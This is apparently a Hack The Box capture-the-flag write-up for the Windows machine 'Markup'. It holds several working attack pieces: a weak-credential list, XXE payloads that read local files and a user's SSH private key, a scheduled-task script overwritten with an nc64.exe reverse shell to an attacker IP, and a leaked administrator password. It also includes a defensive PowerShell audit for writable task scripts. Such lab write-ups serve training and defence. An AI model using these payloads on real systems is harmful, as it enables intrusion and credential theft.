
HTB Markup writeup (always try weak credentials on a login; a CMD-written text file is the most compatible)


HTB Markup writeup

  • Experts, please skip this!
    • Information gathering
      • nmap
      • http
    • Shell as Daniel
    • Shell as administrator

Experts, please skip this!

Attack points on Markup:
1: weak-credential login

2: XXE injection

3: a CMD-written script is the simplest and most compatible

Information gathering

nmap

└─$ nmap -p- --min-rate 1000 10.129.95.192
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-24 09:01 CST
Nmap scan report for 10.129.95.192
Host is up (0.33s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 132.86 seconds

└─$ nmap -p22,80,443 -sC -sV --min-rate 1000 10.129.95.192
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-24 09:05 CST
Nmap scan report for 10.129.95.192
Host is up (0.35s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
|   3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA)
|   256 90:7d:96:a9:6e:9e:4d:40:94:e7:bb:55:eb:b3:0b:97 (ECDSA)
|_  256 f9:10:eb:76:d4:6d:4f:3e:17:f3:93:d6:0b:8c:4b:81 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
|_http-title: MegaShopping
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
443/tcp open  ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
|_http-title: MegaShopping
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
| tls-alpn:
|_  http/1.1
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.99 seconds

The target exposes SSH on port 22 and HTTP on ports 80 and 443. The operating system is Windows (Win64) and the backend runs PHP/7.2.28.

http

Testing showed that ports 80 and 443 serve the same application, and there is no domain name.

gobuster

└─$ gobuster dir -u http://10.129.95.192/ -t 100 -o gobuster.log --no-error -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.95.192/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/contact.php          (Status: 302) [Size: 110] [--> /index.php]
/images               (Status: 301) [Size: 340] [--> http://10.129.95.192/images/]
/db.php               (Status: 200) [Size: 0]
/about.php            (Status: 302) [Size: 108] [--> /index.php]
/home.php             (Status: 302) [Size: 107] [--> /index.php]
/webalizer            (Status: 403) [Size: 1046]
/products.php         (Status: 302) [Size: 111] [--> /index.php]
/Images               (Status: 301) [Size: 340] [--> http://10.129.95.192/Images/]
/services.php         (Status: 302) [Size: 111] [--> /index.php]
/index.php            (Status: 200) [Size: 12100]
/phpmyadmin           (Status: 403) [Size: 1205]
/Services.php         (Status: 302) [Size: 111] [--> /index.php]
/examples             (Status: 503) [Size: 1060]
/Home.php             (Status: 302) [Size: 107] [--> /index.php]
/Products.php         (Status: 302) [Size: 111] [--> /index.php]
/process.php          (Status: 302) [Size: 110] [--> /index.php]
/About.php            (Status: 302) [Size: 108] [--> /index.php]
/Contact.php          (Status: 302) [Size: 110] [--> /index.php]
/DB.php               (Status: 200) [Size: 0]
/IMAGES               (Status: 301) [Size: 340] [--> http://10.129.95.192/IMAGES/]
/licenses             (Status: 403) [Size: 1205]
/server-status        (Status: 403) [Size: 1205]
/Index.php            (Status: 200) [Size: 12100]
/con.php              (Status: 403) [Size: 1046]
/con                  (Status: 403) [Size: 1046]
/HOME.php             (Status: 302) [Size: 107] [--> /index.php]
/aux.php              (Status: 403) [Size: 1046]
/aux                  (Status: 403) [Size: 1046]
/ABOUT.php            (Status: 302) [Size: 108] [--> /index.php]
/CONTACT.php          (Status: 302) [Size: 110] [--> /index.php]
/PRODUCTS.php         (Status: 302) [Size: 111] [--> /index.php]
/Process.php          (Status: 302) [Size: 110] [--> /index.php]
/Db.php               (Status: 200) [Size: 0]
/PROCESS.php          (Status: 302) [Size: 110] [--> /index.php]
/prn.php              (Status: 403) [Size: 1046]
/prn                  (Status: 403) [Size: 1046]
/server-info          (Status: 403) [Size: 1205]
Progress: 59998 / 60000 (100.00%)
===============================================================
Finished
===============================================================

No other valuable information was disclosed.

Shell as Daniel

XXE

XXE (XML External Entity Injection) is a vulnerability in applications that process XML input. It occurs when the server-side parser handles user-supplied XML without disabling or restricting external entity references. Because the parser resolves those references, an attacker can read local files, probe the internal network, cause a denial of service, or chain the flaw with other vulnerabilities; the impact ranges from sensitive-information disclosure and SSRF to DoS and, in some configurations, code execution. Exploitation means crafting XML that declares an external entity to read a file, trigger SSRF, or perform blind XXE; tools such as Burp Suite and Nmap can assist testing. Defences: disable external entities and DTD processing in the parser, validate input, restrict the server's outbound network access, and keep the parser up to date.

Logging into the web service with the weak credential admin:password succeeded.

Weak-credential list

admin:admin
administrator:administrator
admin:administrator
admin:password
administrator:password

Testing showed that the Order function is vulnerable to XXE.

The page source leaks a username: Daniel.

POC

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">]>
<order>
  <quantity>&xxe;</quantity>
  <item>&xxe;</item>
  <address>&xxe;</address>
</order>

Exploit: retrieve Daniel's SSH private key.

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///C:/users/Daniel/.ssh/id_rsa">]>
<order>
  <quantity>&xxe;</quantity>
  <item>&xxe;</item>
  <address>&xxe;</address>
</order>

Save the private key on Kali and log in over SSH.

chmod 600 id_rsa
ssh daniel@10.129.95.192 -i id_rsa

Shell as administrator

Method 1: scheduled task

This worked after a lot of retries. Run the command outside the PowerShell (use the exit command to get out of PowerShell). Do not create the scheduled-task script from PowerShell.
Creating it from CMD is the simplest and most compatible; from PowerShell you must explicitly pass -Encoding ascii/oem, otherwise the default Unicode (UTF-16) output produces a script that cmd cannot execute.

Check for non-system files or folders: Log-Management.

daniel@MARKUP C:\Users\daniel\Desktop>cd \

daniel@MARKUP C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is BA76-B4E3

 Directory of C:\

10/14/2025  12:41 AM    <DIR>          Log-Management
09/15/2018  12:12 AM    <DIR>          PerfLogs
07/28/2021  02:01 AM    <DIR>          Program Files
09/15/2018  12:21 AM    <DIR>          Program Files (x86)
07/28/2021  03:38 AM                 0 Recovery.txt
03/05/2020  05:40 AM    <DIR>          Users
07/28/2021  02:16 AM    <DIR>          Windows
03/05/2020  10:15 AM    <DIR>          xampp
               1 File(s)              0 bytes
               7 Dir(s)   7,375,269,888 bytes free

The scheduled-task script job.bat is found; checking its permissions shows that user daniel has full control over it.

daniel@MARKUP C:\Log-Management>dir
 Volume in drive C has no label.
 Volume Serial Number is BA76-B4E3

 Directory of C:\Log-Management

10/14/2025  12:53 AM    <DIR>          .
10/14/2025  12:53 AM    <DIR>          ..
03/06/2020  02:42 AM               346 job.bat
               1 File(s)            346 bytes
               2 Dir(s)   7,381,422,080 bytes free

Contents of the job.bat script: only an administrator can run it.

daniel@MARKUP C:\Log-Management>type job.bat
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
:theEnd
exit

job.bat permissions

daniel@MARKUP C:\Log-Management>icacls job.bat
job.bat NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)
        BUILTIN\Users:(I)(RX)
        MARKUP\daniel:(I)(F)

Successfully processed 1 files; Failed processing 0 files

User privileges.

daniel@MARKUP C:\Log-Management>whoami /all

USER INFORMATION
----------------

User Name     SID
============= =============================================
markup\daniel S-1-5-21-103432172-3528565615-2854469147-1000


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                           Attributes
====================================== ================ ============================================= ==================================================
Everyone                               Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
MARKUP\Web Admins                      Alias            S-1-5-21-103432172-3528565615-2854469147-1001 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users        Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                   Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
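The icacls check above, done by hand on job.bat, generalised into a defender's audit. This is an added example, not code from the writeup: it lists every scheduled-task action whose script or executable can be modified by a principal outside SYSTEM/Administrators/TrustedInstaller, which is exactly the condition that lets MARKUP\daniel replace job.bat. It assumes an elevated PowerShell on the Windows host (so Get-ScheduledTask sees all tasks); the function name and the trusted-writer list are my own choices.

```powershell
# Added audit example (not part of the original writeup).
# Principals that may legitimately write to a file a scheduled task executes.
$trustedWriters = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    'NT SERVICE\TrustedInstaller'
)

# Rights that let a principal change what the task will run. GENERIC_WRITE and
# GENERIC_ALL (0x40000000 / 0x10000000) show up in some inherited ACEs as raw
# bits rather than named FileSystemRights values, so they are OR-ed in too.
$writeMask = 0
foreach ($r in 'WriteData','AppendData','Delete','WriteDacl','TakeOwnership','FullControl') {
    $writeMask = $writeMask -bor [int][System.Security.AccessControl.FileSystemRights]$r
}
$writeMask = $writeMask -bor 0x40000000 -bor 0x10000000

function Get-WritableTaskScript {
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no path
            # Expand %VARS% and strip quotes so Test-Path/Get-Acl get a clean path.
            $path = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            if (-not (Test-Path -LiteralPath $path -PathType Leaf)) { continue }

            foreach ($ace in (Get-Acl -LiteralPath $path).Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                if ($trustedWriters -contains $ace.IdentityReference.Value) { continue }
                if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }

                [pscustomobject]@{
                    Task   = $task.TaskPath + $task.TaskName
                    RunAs  = $task.Principal.UserId
                    Script = $path
                    Writer = $ace.IdentityReference.Value
                    Rights = $ace.FileSystemRights
                }
            }
        }
    }
}

# A row whose RunAs is an administrator or SYSTEM but whose Writer is an
# ordinary user is a privilege-escalation path. On Markup the expected row is
# C:\Log-Management\job.bat writable by MARKUP\daniel (BUILTIN\Users only has RX).
Get-WritableTaskScript | Sort-Object Task | Format-Table -AutoSize
```

Remediation is to remove the write ACE (icacls <file> /remove:g <user>) or move the script into a directory that only administrators can write to, and to verify that no scheduled task runs a script from a user-writable location.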

Use the cmd command line to generate a new job.bat script and obtain a reverse shell.

Download nc64.exe to Kali, then upload it to the target.

https://github.com/rahuldottech/netcat-for-windows/releases/download/1.12/nc64.exe
daniel@MARKUP C:\Log-Management>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Log-Management> wget http://10.10.16.9/nc64.exe -outfile nc64.exe

PS C:\Log-Management> dir

    Directory: C:\Log-Management

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/6/2020   1:42 AM            346 job.bat
-a----       10/14/2025   1:04 AM          45272 nc64.exe

Generate the new job.bat from the cmd command line.

PS C:\Log-Management> exit
daniel@MARKUP C:\Log-Management>echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.16.9 9000 > C:\Log-Management\job.bat
daniel@MARKUP C:\Log-Management>type job.bat
C:\Log-Management\nc64.exe -e cmd.exe 10.10.16.9 9000

Method 2: information gathering

Start an HTTP server on Kali and download winPEASx64.exe to the target.

└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.95.192 - - [25/Sep/2025 11:32:56] "GET /winPEASx64.exe HTTP/1.1" 200 -

daniel@MARKUP C:\Users\daniel\Desktop>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\daniel\Desktop> wget http://10.10.16.4/winPEASx64.exe -outfile winPEASx64.exe

Run winPEASx64.exe to collect host information; it reveals the administrator password.

PS C:\Users\daniel\Desktop> .\winPEASx64.exe
...[snip]...
+----------¦ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultUserName               :  Administrator
    DefaultPassword               :  Yhk}QE&j<3M
...[snip]...

Log in as the administrator

└─$ ssh administrator@10.129.95.192
administrator@10.129.95.192's password:
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

administrator@MARKUP C:\Users\Administrator>whoami
markup\administrator